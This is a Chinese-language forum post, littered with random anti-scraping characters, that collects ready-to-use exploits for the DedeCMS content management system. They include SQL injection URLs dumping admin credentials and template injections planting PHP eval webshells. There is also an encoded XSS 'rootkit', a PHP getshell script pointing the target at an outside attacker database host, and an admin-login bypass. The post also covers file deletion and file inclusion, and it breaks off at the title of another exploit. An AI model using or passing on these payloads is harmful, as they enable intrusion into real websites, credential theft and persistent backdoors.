|
|
8 @7 v: k9 r& X q9 y: q/ N* T
Dedecms 5.6 rss注入漏洞
( m6 K ?4 J: O9 @7 ?8 Ghttp://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1- B& y" a! M! ]$ K" _2 \
* q i2 D: H$ o4 H
) `+ H4 S% J! e3 J: U& ~/ z& H. j* p2 Q. D. M9 w ~
# \. x5 G5 E/ K! k5 a$ T ], e
4 r* x O/ ~' x* a# `: e7 O& F3 @* |% }
: ~% K3 X% H& E0 U
( i" z6 @8 p+ i# \- m* D$ Q2 h+ CDedeCms v5.6 嵌入恶意代码执行漏洞& P! H! X# g* o: G
注册会员,上传软件:本地地址中填入 a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}' T& Z) I- g* [' f7 y
发表后查看或修改即可执行
* f3 Q, H5 y2 m- D: Z9 ta{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}2 j' E6 j4 v8 D" K4 l, a7 `
生成x.php 密码xiao,直接生成一句话。+ k( L& a$ g2 T
# W. k- s3 F: W1 D7 w, M) q& e3 i; u
- @7 s) K( J0 {- d9 ]5 r
7 `" Q) {; q% l- V: `& o. x! Y
) Z: H/ J: Q( ~2 x8 k' {/ a
" y3 g8 K9 q, r- t
2 v' o# }8 ~9 P6 Y# V" i6 J3 t* D* c3 ?- E" H. B
Dede 5.6 GBK SQL注入漏洞/ ^ B9 U* n" P: h# N. \
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';: M( ~: l. {! m% V$ h* k
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
0 P' R0 k: ^3 g% z4 D: N$ Whttp://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A74 P. p0 \% x6 I4 Y
% u7 \4 @0 e0 e8 n. h
$ D% U6 r# j' Z) f" R7 F$ I9 N
4 G1 E) t% Q% Y0 i
0 r6 }4 N) Q1 J# h! m) L
0 _5 n0 ?! g: v9 f" x
! J1 O' ?! {# O( `4 j/ b! C+ n5 F7 `0 F8 a0 p5 s3 W
; i, ^6 G! G" f% vDedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞$ M& H" R9 [/ p& ?. H
http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
. H; b2 [/ J+ l1 n& |3 O6 n/ Q6 Q& ^* c& g" ]3 A
: b: P% Z" e7 H1 K
9 M3 c: D' q, e
8 b% P, |4 T$ M! y
& S' ?3 k6 s" F8 n2 }( A j% d# V; ~8 v" Y0 ]
DEDECMS 全版本 gotopage变量XSS漏洞9 k# n& I1 Z- M, s2 s/ F: F, L
1.复制粘贴下面的URL访问,触发XSS安装XSS ROOTKIT,注意IE8/9等会拦截URL类型的XSS漏洞,需关闭XSS筛选器。
- w& i# l; g" D/ F7 Lhttp://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="
. j% q( y$ b) x9 p; J d! d7 `1 u0 ^ o; v- u% m8 S
. e+ X" }" j. n( J' ~( x/ l! N
2.关闭浏览器,无论怎么访问下面的任意URL,都会触发我们的XSS。 2 p2 d0 X9 r9 A7 D% V) s0 X: ~
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda* ^; ?6 f2 Q1 r r* \
* p6 U9 ~8 A4 X6 G$ z! m% G8 H/ A0 Q/ s1 n3 W) L
http://v57.demo.dedecms.com/dede/login.php
m) n0 H5 D( |. _; k8 }9 Z$ |% m* ]+ @9 Y, c7 S1 b6 e, q( m1 k4 y
* X s0 S( ^: f/ o4 ?color=Red]DeDeCMS(织梦)变量覆盖getshell
+ R3 J- r# Q4 }, }4 E: P7 o#!usr/bin/php -w
# W h W A4 S. p3 x<?php
; W$ [/ j' A% h$ oerror_reporting(E_ERROR);
* ^5 p# {2 T+ U& a. @% Yset_time_limit(0);6 e! J* v- N- {4 j6 }- ?4 x: B
print_r('" z- H# q( ~: g9 A
DEDEcms Variable Coverage& j: s; m" Z1 k7 }- T: b! Z
Exploit Author: www.heixiaozi.comwww.webvul.com
, N% d% e0 r. o, n [; W0 x);
& r5 \# j; ^% l& R* F" d/ Mecho "\r\n";6 ~8 n9 u1 N* c) J& O+ ?& x
if($argv[2]==null){" J. ^3 ?* m+ n( ^$ K" S+ x# ` f; k
print_r(') G1 I& _/ x# b
+---------------------------------------------------------------------------+
! n& A( v6 y4 ?, V( B; U1 M5 ]Usage: php '.$argv[0].' url aid path
2 F# R$ ^, |* U4 e( Haid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
' |$ u h7 g/ SExample:
$ ]& D, ?" a; ~3 K. h4 nphp '.$argv[0].' www.site.com 1 old+ j* p; _4 g8 \/ J/ {
+---------------------------------------------------------------------------+5 s2 }( U# M, w5 D. [
');5 _9 N; N, U/ O+ ^+ r$ \9 P9 k3 F
exit;0 A A, Q. @0 t }0 {3 a/ m9 {* w
}6 p* _, O/ c1 \
$url=$argv[1];2 L5 S" Y) O: @- e8 d
$aid=$argv[2];' c* M \' i& c3 {9 H/ H
$path=$argv[3];
3 t/ y$ v6 z. A+ L$exp=Getshell($url,$aid,$path);0 k; R$ i8 v* S, I7 f' U
if (strpos($exp,"OK")>12){8 p3 [/ i: m2 i- d
echo "
' N. |5 E5 y' ?6 S1 a& s( TExploit Success \n";6 X# P* i5 S* a2 Z
if($aid==1)echo ") ~+ Z5 {4 |9 V5 t) Q! Z$ L
Shell:".$url."/$path/data/cache/fuck.php\n" ; o u# B8 M: g# S' i% W
+ t; p! D# W; n K; N
+ A; x( L" C- @ k i9 yif($aid==2)echo "
) n% Y- j, s _) Q* K( t' HShell:".$url."/$path/fuck.php\n" ;
% H/ e- \: A$ J7 z9 l5 O! ^
6 i3 h5 U- Y. o( R7 C. [" j. b4 Y) v% j' d$ w
if($aid==3)echo "& J+ @# V+ W m1 G1 R" g
Shell:".$url."/$path/plus/fuck.php\n"; f( a; l2 j) ]$ ]
1 T3 \7 c# J) j
$ A, O% T) J' P0 z% |8 f}else{
/ n: T3 X, I3 Cecho "3 C' q* Q, T( g, a4 T! u) P6 N6 j9 X
Exploit Failed \n";* ]# l! V* e- z X% w1 ~
}5 L: v; d* g5 l
function Getshell($url,$aid,$path){0 {7 q- T) b: u+ A5 v$ V- Y
$id=$aid;
) s% ?" Y; @! t" }: J, R. {$host=$url;9 j/ ?! ^( w% \: P
$port="80";2 A' k0 }2 i. q+ d4 v1 s; y
$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
$ p+ x" O, v% s$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";, s" R- L4 e5 A v6 G9 E
$data .= "Host: ".$host."\r\n";
! k8 k( w$ |! k" ~' ]$ K$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
+ n" K4 A2 T8 d" a; G7 E2 q$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";" I3 F& u$ t7 H+ K/ X
$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
! e; Y7 {. Y$ z" f1 k1 ~//$data .= "Accept-Encoding: gzip,deflate\r\n";, Y6 N3 s+ D# F/ E1 s7 m
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
$ }# w2 i" d3 E: S+ m& k s/ E$data .= "Connection: keep-alive\r\n";
, v( V1 g" w& c$ ~! q- m$data .= "Content-Type: application/x-www-form-urlencoded\r\n";2 j# H: A4 t8 a: _; J
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
8 C8 D* ]+ H' K/ Z$data .= $content."\r\n";
: b% C+ s9 N1 u: B0 Q9 x1 z$ock=fsockopen($host,$port);
; @( K5 S. y0 U" @! l8 k! j1 kif (!$ock) {! e/ \$ n% a* n5 W
echo "' {; h& c( L. m
No response from ".$host."\n";7 y' { {9 f0 |" @7 r4 u; d7 J5 T
}
- I9 l8 ^- W8 C4 J" g5 c/ h Bfwrite($ock,$data);
% {* G+ }/ u$ z2 \& {while (!feof($ock)) {
$ ?, Z7 ?5 W. Q+ Q% I$exp=fgets($ock, 1024);
. J" i, ^; C8 ?: { J2 g& W X Qreturn $exp;
" {: S/ c2 z5 P}
; m, w$ ?/ r4 ~/ M6 D- L}
9 d( u! m" [( ~9 o4 B# u8 E4 t7 D( l" N' s; I: J: E! o+ A4 L
% u, ~' Z0 y+ G! G7 u?>
4 `! n' G. h6 Z& X" G* z6 V/ }2 q6 T& z1 A7 r6 E) a" r1 `# J& e
; T7 e+ a: i, n" x7 ~' F
7 b8 A$ Y* d6 r& h
/ g) B6 N, a! {6 F0 i- \1 S n( g
4 n" z+ {2 Y. e6 ?" `6 q# b* G% @9 }4 J2 G
9 M& w( j( n% `* J
; ^. W5 ]$ b. Q! i x
8 } s8 ^; B. I. G# JDedeCms v5.6-5.7 越权访问漏洞(直接进入后台)
: |, F% U) t" M$ Xhttp://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
4 d" ^% z4 \: I y: P* W' \- c0 z' C
, e; i$ K$ R6 {% e把上面validate=dcug改为当前的验证码,即可直接进入网站后台( `- v; u; {0 x t- D+ @ E' A
0 P( T M) m# ~3 Z" O: o) P. f0 Q( I7 H9 z4 P# i
此漏洞的前提是必须得到后台路径才能实现/ V& _$ ~, F! N
: r! A5 N4 j# a: S
( S/ t) }( i) C4 f& }$ f# `( u- D; W0 t9 v$ j
3 V3 V( m! L+ a! N& C
, {; i1 P0 \" q- t0 M4 @+ |) e" H. X# _
+ q3 C" A) o2 k% W, m+ B
; Z9 T+ n+ g: ^, I$ O: _, z/ s; G( ~% @1 c& T& Q C: q
* |9 n1 {% _0 f$ E& i) `5 c5 ]Dedecms织梦 标签远程文件写入漏洞
- [0 C* u; L8 t% i8 u' @* L- Q前题条件,必须准备好自己的dede数据库,然后插入数据: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');, R8 X, [- }; I* E
) N! ^' y4 h! `7 k- J6 @% d1 J: k: D8 m1 c$ r
再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。
& t9 ]0 t! y! c7 [) a<form action="" method="post" name="QuickSearch" id="QuickSearch">1 w* x& j9 B# a0 M. F% Q A' S
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br /> K) ?7 t8 c& d2 i& _
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />- J0 r) ~( P: H' g) A* c5 h
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
, T% G5 l1 w6 G6 G<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
3 H9 A/ s4 O0 k" X" l3 p: j" J<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
: _) \, @$ ^# n) O. f# g* S' S<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />( z' M/ I& N0 P' [
<input type="text" value="true" name="nocache" style="width:400">
; N& z( e x" }& k3 {* p<input type="submit" value="提交" name="QuickSearchBtn"><br /># h- ^$ F: k. u) v) `3 Q$ o7 p, w
</form>
# c2 m1 z3 I. Z/ V<script>
( u- f& W3 W+ d9 [function addaction()
( l) v& @0 A( ]7 ^: C- I0 h) `7 K{2 `" i( \. U4 M l/ h) z7 T# d
document.QuickSearch.action=document.QuickSearch.doaction.value;$ o" O9 r8 ?: ?( `
}8 e8 M7 G6 l# E% C5 U; j, `
</script>- x6 P2 r4 v* E" `3 X( ]# }
4 e' N; J8 z# {+ f/ Y& X4 o. ^2 ~) t6 [6 l) ~& A; `
0 e6 v" f8 p# o* e' w) N! P! u$ o' L( P+ Q( ^7 `4 R
' `' z6 v# k+ F D! q
2 [' H# G* ~0 |. v1 u
4 g4 O: }. {( \ h, _4 j5 r/ L1 w s+ l% w$ }) A
3 f3 w2 J+ [% l- ?
+ k# t( j1 r3 h U5 }# WDedeCms v5.6 嵌入恶意代码执行漏洞) `3 s: U4 {- J5 n! A) ]
注册会员,上传软件:本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行
6 r3 B" N# q# q- ^a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
3 J; d* ?5 ^' T# e生成x.php 密码:xiao直接生成一句话。密码xiao 大家懂得 d- P% |' I0 J, B$ I
Dedecms <= V5.6 Final模板执行漏洞
: j: k! U+ a. S注册一个用户,进入用户管理后台,发表一篇文章,上传一个图片,然后在附件管理里,把图片替换为我们精心构造的模板,比如图片名称是:
. U2 V/ I9 ]& j2 K! W5 Muploads/userup/2/12OMX04-15A.jpg
( O3 O; d0 a9 j$ Z, B1 U/ H: ~" u6 J6 r# t) O, q
+ I' f( r+ ^7 d9 h5 V模板内容是(如果限制图片格式,加gif89a):
# F: \. t0 d0 D2 [5 g3 k; h6 u; v/ M{dede:name runphp='yes'}# }7 N$ k' X8 D9 g$ v0 E
$fp = @fopen("1.php", 'a');* r! [0 Y* P0 n) F4 N
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");1 P* X, b, _8 ]& G2 S
@fclose($fp);; w* Q; N9 M* J
{/dede:name}
) _1 f V* V" w$ [2 修改刚刚发表的文章,查看源文件,构造一个表单:- c9 e2 M3 K* G, P: n
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
3 n% B9 M% V4 }4 c3 v<input type="hidden" name="dopost" value="save" />% l8 P! N7 z9 T1 ~7 T: K" [3 W
<input type="hidden" name="aid" value="2" />/ J1 W& e: k3 n: _% `8 v
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />! x. e5 X$ D8 C; B
<input type="hidden" name="channelid" value="1" />
6 T; |9 d1 [: z<input type="hidden" name="oldlitpic" value="" />
- {. W& p; ]4 P' o# O8 o1 E# \8 A3 O H<input type="hidden" name="sortrank" value="1275972263" />
# C7 A, p5 o; o3 ?6 X
; ?- e3 T) m, o3 W( f G+ F7 U
$ f! H6 U# ]6 s7 ^* y7 k$ }& {$ j<div id="mainCp">
5 e/ } @2 D. x; x9 L2 _, E/ Z<h3 class="meTitle"><strong>修改文章</strong></h3>
8 P2 J* i) N& x3 ?+ S; p
. L0 |1 q- t; Q/ N' W T. Y4 @7 S: S+ A% T# `0 R" T$ J
<div class="postForm">
! i. m5 D3 S7 v. p/ C<label>标题:</label>8 j6 {; K7 @2 t. \2 n- X
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>1 ~" d% X3 I, o/ E/ b7 X8 g
8 \; O! k. p6 [5 z, [& `
! m) B: b% l; C) V- w2 Z<label>标签TAG:</label>3 Y; e6 q% R1 ?9 S9 S' \/ x$ F
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)
. O' n2 k1 l. Q; B n0 S W. ]: Y3 w( W! }1 W9 y
0 `7 P% r) L) r4 u5 k- D, @* v9 s2 y<label>作者:</label>
; K1 x4 Z% K) k<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>1 l2 {) N# t9 a# o. L
& s0 y2 F) j$ U7 y% L/ ^# t1 p
- S8 S5 _+ s; H0 K9 J q8 W5 p" }! `
<label>隶属栏目:</label>
( V" ?4 u. ]5 ?. a2 _, i<select name='typeid' size='1'>
- ^+ U8 F+ C, j8 F! P<option value='1' class='option3' selected=''>测试栏目</option>7 R; a7 b0 v1 L
</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)
4 C9 a! B% K, f3 R3 j0 r
& H. B _- m: t' M# l7 c6 E" n
0 q1 y5 ~: x( V7 z/ n' r% [4 {<label>我的分类:</label>! v6 _8 Q9 X U5 A( q* t
<select name='mtypesid' size='1'>; {% K6 v/ Z, _; U$ z
<option value='0' selected>请选择分类...</option>
. |9 g. b# V0 r9 n& S' k2 }! K<option value='1' class='option3' selected>hahahha</option># D9 y4 N; Q' j+ R: I" {4 X
</select>
. [8 y2 }5 {' x1 s+ y2 k B6 N/ x
+ b9 \# p: Z) G7 U' u<label>信息摘要:</label>
- U1 @6 [' L$ r; T3 ~# |: m' x<textarea name="description" id="description">1111111</textarea>4 R6 T$ y5 G" o1 y5 T* f
(内容的简要说明)/ v0 `; {5 u: r2 U+ h: J
. q7 y- b+ ?2 {0 x
1 a$ l! N/ M' d% v. z- p<label>缩略图:</label>
5 v$ D: M0 w- G9 J3 D: S9 T<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>
3 y; c9 Y% U) L7 g# a
' _/ ^* |7 C) F; P& h$ g Y. q( z0 l" f/ }" C" n
<input type='text' name='templet'
, B0 d* m" @; [- R5 {value="../ uploads/userup/2/12OMX04-15A.jpg">
' L: X( z* \. y6 _( p. A<input type='text' name='dede_addonfields'4 H( p" _ ^ N: h
value="templet,htmltext;">(这里构造)
* L4 S% X" w1 T0 C5 M/ v6 R& A8 V& r</div>
* [: T9 K% M0 \# m7 b2 J, f6 u; Q# u4 f
3 g) }' E# {7 D: A3 [( p<!-- 表单操作区域 -->* y1 h+ J1 f) o! n* z
<h3 class="meTitle">详细内容</h3>
5 C# ~ J5 I; j" s7 f" \, Y0 P" \" m. ~/ H- c, ]: ]6 H8 l4 z0 L' e
6 r! p, L# m7 l. U- d2 B
<div class="contentShow postForm">
. C/ A) |6 B" [* I$ g<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>0 P6 x( z( a! _0 ?7 K. Q
6 U# c6 t# Y- J% |4 }. F
/ I; x# c# J q9 g' v8 e<label>验证码:</label>$ t( q9 b' i, e
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
$ I$ R, U( T& d- x<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />
: M- z" R, ^% r
2 b) A2 ?2 B2 K3 j; r( }5 H8 N8 R1 g, n- l& ~
<button class="button2" type="submit">提交</button>1 Y% u6 M, X5 G H# M% N
<button class="button2 ml10" type="reset">重置</button>$ W# o6 B" _* g: i
</div>7 E( O1 B( Y) z# a' Y5 E+ G
1 H) C# @4 u2 P4 x1 }
6 w1 K9 z. W" I: g0 q$ W' y
</div>
$ u; Z: B4 E5 r. A' Z: K
^& b% t+ c( D8 }' K# U
2 y' O/ L9 J8 G+ T</form>
8 }- V. K7 Q$ p" J, V6 f; d0 B- C/ j2 z, h8 Y7 j1 A
: d; d: U0 O! x0 ~) C% y" G# T提交,提示修改成功,则我们已经成功修改模板路径。 3 访问修改的文章:
4 v6 i& }5 o* @" H假设刚刚修改的文章的aid为2,则我们只需要访问:
& P1 N Y. ^9 p/ L. } ~7 r! B/ Phttp://127.0.0.1/dede/plus/view.php?aid=22 i& _0 y8 S9 R. P( q
即可以在plus目录下生成webshell:1.php
; E- u* G+ b; @$ U
* ~$ R& {$ {4 `9 m S3 p- T v+ }) q% g
' U( v+ s' k% @8 s3 N$ p0 }8 S. T0 E4 N! l8 p
* J: H# _/ x$ Y- ^
( o$ |: }( l8 Y% W/ n- q7 X" g6 I
2 `. [# G- e( |% A, f* H. k- {/ W% c% V" C5 ?
; _5 ~, Z5 u& d2 H! b6 v
( {4 E6 G! B& q) w3 F5 e
$ V- q6 B, U5 ^% M% A/ v9 K4 [
& \1 D" E3 y+ e* ~; ODEDECMS网站管理系统Get Shell漏洞(5.3/5.6)
# f" F6 v7 z+ b7 mGif89a{dede:field name='toby57' runphp='yes'}4 T( H4 ?. G! E
phpinfo();% Y, A' H1 h$ m V+ d- E
{/dede:field}0 i {# E# m, A3 b+ R* q7 |8 E {
保存为1.gif
" d* a' X. ~) g1 i4 ~9 X<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" "> ; o) M, `* l- Y
<input type="hidden" name="aid" value="7" />
: Q- \7 ~9 U; ]7 Y- ~; `0 I1 v<input type="hidden" name="mediatype" value="1" /> ) R4 X' I8 [5 a- L V% `
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br> ( `1 O6 g+ f& ^! l$ Y1 N
<input type="hidden" name="dopost" value="save" /> ' k% p9 W2 S% D4 r1 n8 R
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
, q- m& L3 ]0 u4 x/ v<input name="addonfile" type="file" id="addonfile"/>
8 X# h& r2 C! |' E/ ~" l2 W; Y<button class="button2" type="submit" >更改</button> " H6 q( X) N+ z# `
</form>
- P4 u% d! }3 v+ K) J( A" _1 A- b* e8 F0 n) r0 {- I% e7 Q
5 T4 f" Q- e+ E3 `构造如上表单,上传后图片保存为/uploads/userup/3/1.gif
6 L9 g) z; k/ y/ h* M% J8 m3 [发表文章,然后构造修改表单如下:( Q5 z/ r) }+ G9 p0 c S8 K
7 p2 D. G5 M5 |
, z5 T$ F. b0 W8 T( v6 H( V5 J
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
" c% K. Y, c' W5 [( F<input type="hidden" name="dopost" value="save" />
4 l6 ^$ X$ k& c9 Z2 ~- q- ?<input type="hidden" name="aid" value="2" /> 5 I) [1 S+ b) s5 {: }
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
% J* g2 r2 S. j' }8 \% _) a<input type="hidden" name="channelid" value="1" />
# s8 B% G! `6 r, }: j4 |<input type="hidden" name="oldlitpic" value="" /> 8 ^2 Q# l, d% j# p$ ~+ t/ K
<input type="hidden" name="sortrank" value="1282049150" />
; x$ ?) ~# @ W9 G& @<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
3 e' @" \3 _& X- p7 J<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
( W! o( ?) ]2 B2 W i- M1 l( e<select name='typeid' size='1'> " X& u$ T1 Q" A9 U8 a
<option value='1' class='option3' selected=''>Test</option>
+ J+ Q* A$ k" o4 d' z( f<select name='mtypesid' size='1'> , y5 i+ Y; A) Z, a- p
<option value='0' selected>请选择分类...</option> 8 N3 i1 {+ q% H3 W8 q* G
<option value='1' class='option3' selected>aa</option></select> 2 B7 Z( ~* y% q
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
5 z: _- @8 Q" ]/ u6 n<input type='hidden' name='dede_addonfields' value="templet">
) K4 r1 ~0 E& r! Y<input type='hidden' name='templet' value="../uploads/userup/3/1.gif"> # G9 Y) w* ~6 R; s: i
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" /> 5 q9 n9 j: ?4 m% `
<button class="button2" type="submit">提交</button>
: g. R" J" V) Q2 }) k: e</form>
; \$ U/ s# O; R) d/ O" ?% Q% g
3 F* m, N7 g2 {5 o$ O6 a4 }& C
. |, ~- F% i- E0 h* f y; |) B2 P; G8 c
6 f/ g" I5 P" _! ~
9 J' @5 ^- K- G% i$ ~5 {. ~* q$ W7 D7 a6 F
) E$ C7 k3 D0 R& Q. x. q0 J' e% I6 \
3 r( {5 s P$ R- { x8 B% R$ k4 T8 n5 M' D }4 f6 L
* `! o8 ~0 L* F6 K
$ B9 I _1 B5 H5 e
: F4 s' `' G) m织梦(Dedecms)V5.6 远程文件删除漏洞
5 u7 X3 F) `" n6 p. J2 S N: R. Chttp://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif
# b2 p) ]$ j& l* U7 Y. M$ u0 \& t& |$ n
6 ^& ]4 W7 {# x
2 q. \% }: _! m1 }" m) k" t3 E: o6 t8 h3 T
+ m. u3 B' p" ?8 y
3 q1 A, [( J- M J
5 M; J ~% X7 ?# Q
) a$ t p5 ]* @5 R
' T0 b; B v' y: X* }' G/ m
7 r0 w5 u3 j1 C, {" }织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞 & T" r; i! u4 t& H. c n
http://www.test.com/plus/carbuya ... urn&code=../../( L( H4 y+ r4 k' L4 Q
3 f$ ]+ [! a2 x) ^$ I" A5 X; I
! m$ Q0 M1 a9 F+ ^( d3 a o% N9 x7 B! n) b$ A7 B+ i! S% e" p
( Q7 P7 J$ m7 P/ c
8 b' y2 a. I& {9 v% A$ o
: D2 X; p# i9 v0 y6 T
0 M3 ~9 w! |6 {
. ^6 _6 u% j% Q# y; R
" K4 Y7 g. y- q
0 Q- P2 g: `$ M4 v# ^9 qDedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞 ; A, }' l. U4 k1 y( R
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`# @! I8 ^3 l3 x- s8 p9 H
密码是32位MD5减去头5位,减去尾七位,得到20 MD5密码,方法是,前减3后减1,得到16位MD5! ?" F3 e1 P0 G
Z/ r; y6 d$ ^. `8 B, z5 e; Z
% Q& z% l' }5 `5 n! @6 J* }& h
$ U* X$ V/ D% q% n k# F. y" h; P+ @ K% }
# n( f: e. A) D$ f- {1 `
0 |. [ k3 f6 ?- x8 E& Q# S
$ m' C) K% \) M3 }& F$ w* n- p' l3 T) q2 |% c8 D3 A: q3 x
$ D$ D+ R$ G- d. t& Z
4 ^' x4 I3 N* O( E' k, B4 R
织梦(Dedecms) 5.1 feedback_js.php 注入漏洞
. K% g! J" D8 c6 ?5 l* ohttp://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='6 f. w0 j# R8 @0 H: C4 A
6 \9 s" f/ p- O$ N' Y' o. Y
% X g* h1 o! s4 r# l% s/ V
9 e, _5 Q% \4 @7 g# K* Q Y. h9 g' \; F) M% f& k
% ?, X: {6 w2 D/ D) g
7 u( [$ o" p- i3 E" I9 Z4 p% J' q9 u
' Q& i5 X5 s* K# b+ G. M5 {
6 e' B- B+ c$ e6 N u/ v+ q, w% F2 z% h0 q
织梦(Dedecms)select_soft_post.php页面变量未初始漏洞
2 [3 z4 t. o! \2 s. N: i+ `. I/ V<html>
# Y9 p% Q; K, d1 e7 a e# _<head>
9 g9 s P* z$ ^. |9 K+ u+ d<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
